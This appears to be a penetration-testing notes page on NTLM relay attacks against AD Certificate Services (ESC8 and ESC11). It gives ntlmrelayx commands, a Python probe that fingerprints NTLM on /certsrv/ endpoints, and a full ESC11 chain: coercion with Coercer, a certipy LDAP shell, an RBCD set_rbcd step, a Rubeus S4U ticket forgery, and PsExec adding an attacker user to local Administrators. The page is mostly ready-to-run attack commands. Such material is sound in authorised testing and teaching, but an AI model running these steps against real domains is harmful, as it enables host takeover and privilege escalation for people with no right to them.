
HTTP / RPC relaying

NTLM relay prerequisites (external link)

Set up ntlmrelayx

ntlmrelayx Syslifters Edition

Required cryptography and pyOpenSSL versions:

powershell
pip install cryptography==41.0.7
pip install pyOpenSSL==23.2.0

NTLM relay to AD CS Web Enrollment (ESC8)

Run ntlmrelayx to relay incoming NTLM authentication to the CA's web enrollment endpoint (/certsrv/). This only works when the endpoint accepts NTLM over plain HTTP, or over HTTPS without Extended Protection for Authentication (EPA). The certificate is requested for the relayed account, so the template must allow that account type to enroll: a relayed machine account needs a template that permits computer enrollment (e.g. Machine), a relayed user the User template. If --template is omitted, ntlmrelayx picks Machine for accounts ending in $ and User otherwise.

powershell
ntlmrelayx.py -t http://<ca-name>/certsrv/ -smb2support --adcs --template <VULN-TEMPLATE-NAME>
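Before pointing ntlmrelayx at a CA, check that /certsrv/ really offers NTLM and see what the CA advertises. The script below is an added example, not code from this page, Impacket or the Syslifters edition: it sends a bare NEGOTIATE_MESSAGE in an Authorization header and decodes the CHALLENGE_MESSAGE (target name, NegotiateFlags, TargetInfo AV pairs) that comes back in WWW-Authenticate on a 401. The hostnames (ca01.lab.internal, LAB) and the sample challenge bytes in build_sample_type2() are constructed placeholders so the parser can be exercised offline; probe_certsrv() is the part that talks to a real CA.

```python
import base64
import struct
import urllib.error
import urllib.request
from typing import Optional

# NegotiateFlags bits (MS-NLMP 2.2.2.5) worth reading out of a challenge
FLAGS = {
    "NEGOTIATE_UNICODE": 0x00000001, "NEGOTIATE_OEM": 0x00000002,
    "REQUEST_TARGET": 0x00000004, "NEGOTIATE_SIGN": 0x00000010,
    "NEGOTIATE_SEAL": 0x00000020, "NEGOTIATE_NTLM": 0x00000200,
    "NEGOTIATE_ALWAYS_SIGN": 0x00008000, "TARGET_TYPE_DOMAIN": 0x00010000,
    "TARGET_TYPE_SERVER": 0x00020000, "NEGOTIATE_EXTENDED_SESSIONSECURITY": 0x00080000,
    "NEGOTIATE_TARGET_INFO": 0x00800000, "NEGOTIATE_VERSION": 0x02000000,
    "NEGOTIATE_128": 0x20000000, "NEGOTIATE_KEY_EXCH": 0x40000000,
    "NEGOTIATE_56": 0x80000000,
}
# AvId values of the TargetInfo AV_PAIR list (MS-NLMP 2.2.2.1)
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName"}


def build_type1() -> bytes:
    """Minimal NEGOTIATE_MESSAGE: unicode/OEM, request target name, NTLM."""
    flags = (FLAGS["NEGOTIATE_UNICODE"] | FLAGS["NEGOTIATE_OEM"]
             | FLAGS["REQUEST_TARGET"] | FLAGS["NEGOTIATE_NTLM"])
    # signature, MessageType 1, flags, empty DomainName/Workstation fields
    return b"NTLMSSP\x00" + struct.pack("<II", 1, flags) + b"\x00" * 16


def parse_type2(blob: bytes) -> dict:
    """Decode a CHALLENGE_MESSAGE (MS-NLMP 2.2.1.2): target, flags, AV pairs."""
    if blob[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", blob, 8)[0] != 2:
        raise ValueError("not an NTLM CHALLENGE_MESSAGE")
    tn_len, _, tn_off = struct.unpack_from("<HHI", blob, 12)
    flags = struct.unpack_from("<I", blob, 20)[0]
    challenge = blob[24:32]                      # ServerChallenge
    ti_len, _, ti_off = struct.unpack_from("<HHI", blob, 40)
    enc = "utf-16-le" if flags & FLAGS["NEGOTIATE_UNICODE"] else "ascii"
    target_name = blob[tn_off:tn_off + tn_len].decode(enc)
    av_pairs = {}
    pos, end = ti_off, ti_off + ti_len
    while flags & FLAGS["NEGOTIATE_TARGET_INFO"] and pos + 4 <= end:
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        pos += 4
        if av_id == 0:                           # MsvAvEOL
            break
        value, pos = blob[pos:pos + av_len], pos + av_len
        if av_id in AV_NAMES:                    # string-valued pairs are UTF-16LE
            av_pairs[AV_NAMES[av_id]] = value.decode("utf-16-le")
        elif av_id == 7:                         # MsvAvTimestamp, FILETIME
            av_pairs["Timestamp"] = struct.unpack("<Q", value)[0]
    return {"target_name": target_name, "server_challenge": challenge.hex(),
            "flags": sorted(n for n, bit in FLAGS.items() if flags & bit),
            "target_info": av_pairs}


def probe_certsrv(url: str, timeout: float = 5.0) -> Optional[dict]:
    """Send a NEGOTIATE_MESSAGE to the enrollment URL (network call).

    Returns the decoded CHALLENGE_MESSAGE if the server answers 401 with an
    NTLM challenge, otherwise None (no NTLM offered, or no auth required).
    A challenge over plain http:// is the ESC8 precondition; over https://
    it only counts if EPA (channel binding) is not enforced.
    """
    req = urllib.request.Request(url, headers={
        "Authorization": "NTLM " + base64.b64encode(build_type1()).decode()})
    try:
        urllib.request.urlopen(req, timeout=timeout)
    except urllib.error.HTTPError as err:
        for hdr in err.headers.get_all("WWW-Authenticate") or []:
            if hdr.startswith("NTLM "):
                return parse_type2(base64.b64decode(hdr[5:]))
    return None


def build_sample_type2() -> bytes:
    """Constructed CHALLENGE_MESSAGE as a lab CA (ca01.lab.internal) might
    send it. Example data, not a capture; all names are placeholders."""
    def av(av_id: int, text: str) -> bytes:
        val = text.encode("utf-16-le")
        return struct.pack("<HH", av_id, len(val)) + val
    target = "LAB".encode("utf-16-le")
    target_info = (av(2, "LAB") + av(1, "CA01") + av(4, "lab.internal")
                   + av(3, "ca01.lab.internal") + struct.pack("<HH", 0, 0))
    flags = (FLAGS["NEGOTIATE_UNICODE"] | FLAGS["REQUEST_TARGET"]
             | FLAGS["NEGOTIATE_NTLM"] | FLAGS["TARGET_TYPE_DOMAIN"]
             | FLAGS["NEGOTIATE_EXTENDED_SESSIONSECURITY"]
             | FLAGS["NEGOTIATE_TARGET_INFO"] | FLAGS["NEGOTIATE_VERSION"]
             | FLAGS["NEGOTIATE_128"] | FLAGS["NEGOTIATE_56"])
    hdr_len = 56                                 # fixed part incl. Version
    msg = b"NTLMSSP\x00" + struct.pack("<I", 2)
    msg += struct.pack("<HHI", len(target), len(target), hdr_len)
    msg += struct.pack("<I", flags)
    msg += bytes.fromhex("0123456789abcdef")     # ServerChallenge
    msg += b"\x00" * 8                           # Reserved
    msg += struct.pack("<HHI", len(target_info), len(target_info),
                       hdr_len + len(target))
    msg += bytes([10, 0, 0x63, 0x45, 0, 0, 0, 0x0f])  # Version 10.0.17763, rev 15
    return msg + target + target_info


if __name__ == "__main__":
    import sys
    url = sys.argv[1] if len(sys.argv) > 1 else None
    print(probe_certsrv(url) if url else parse_type2(build_sample_type2()))
```

Run it as `python probe.py http://<ca-name>/certsrv/`; a decoded challenge over http:// means the endpoint is a relay candidate, and the DnsComputerName AV pair tells you which host to name in the -t target. The flags in the challenge are what the server supports, not what it requires: whether the relay succeeds is decided by the transport (HTTP, or HTTPS without EPA), not by the SIGN/SEAL bits.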

TODO

NTLM relay to AD CS RPC interface (ESC11)

Run ntlmrelayx to relay incoming authentication to the CA's MS-ICPR RPC endpoint. ESC11 applies when the CA does not set IF_ENFORCEENCRYPTICERTREQUEST, i.e. it accepts certificate requests without RPC packet privacy (Certipy reports this as "Enforce Encryption for Requests: Disabled"). The certificate is issued to the relayed account from the given template. --smb-port 8445 only moves the SMB listener off 445 (useful when 445 is already taken); the coerced host still connects to 445, so either forward 445 to 8445 or drop the flag.

powershell
python ./examples/ntlmrelayx.py -t rpc://<vuln-ca.lab.internal> --template <cert-temp-name> --smb-port 8445 -rpc-mode ICPR -icpr-ca-name <vuln-ca-name> -smb2support

Coerce the target machine account (VICTIM-HOST$) into authenticating to the listener with Coercer; -l is the listener address the target must be able to reach.

coercer coerce -u <user> -p <password> -d <domain> -l <listener-ip-or-netbios-name> -t <target-ip>

Use the issued certificate (it belongs to VICTIM-HOST$) to open an LDAP shell as that machine account with certipy; -ldap-shell authenticates over LDAPS with the certificate (Schannel), so it works even where PKINIT does not.

certipy auth -pfx certificate.pfx -ldap-shell -dc-ip <dc-ip>

Configure resource-based constrained delegation (RBCD) in the LDAP shell. The syntax is set_rbcd <target> <grantee>: it writes msDS-AllowedToActOnBehalfOfOtherIdentity on the target, which a machine account is allowed to do on its own object, so VICTIM-HOST$ is the target and the grantee is a machine account whose credentials you control (ATTACKER-HOST$, e.g. one created via the machine account quota).

set_rbcd VICTIM-HOST$ ATTACKER-HOST$

Abuse RBCD with Rubeus: authenticate as ATTACKER-HOST$ (the grantee, whose RC4 key you hold), S4U2Self for the admin user, then S4U2Proxy to a service on VICTIM-HOST. The impersonated user must not be in Protected Users or marked "sensitive and cannot be delegated".

Rubeus.exe s4u /user:ATTACKER-HOST$ /rc4:<attacker-machine-rc4-hash> /impersonateuser:<admin> /msdsspn:cifs/VICTIM-HOST /ptt /nowrap

With the service ticket injected, run commands on the victim as the impersonated admin, for example to add an attacker-controlled user to the local Administrators group.

PsExec.exe \\<victim-host> net localgroup Administrators <attacker-user> /add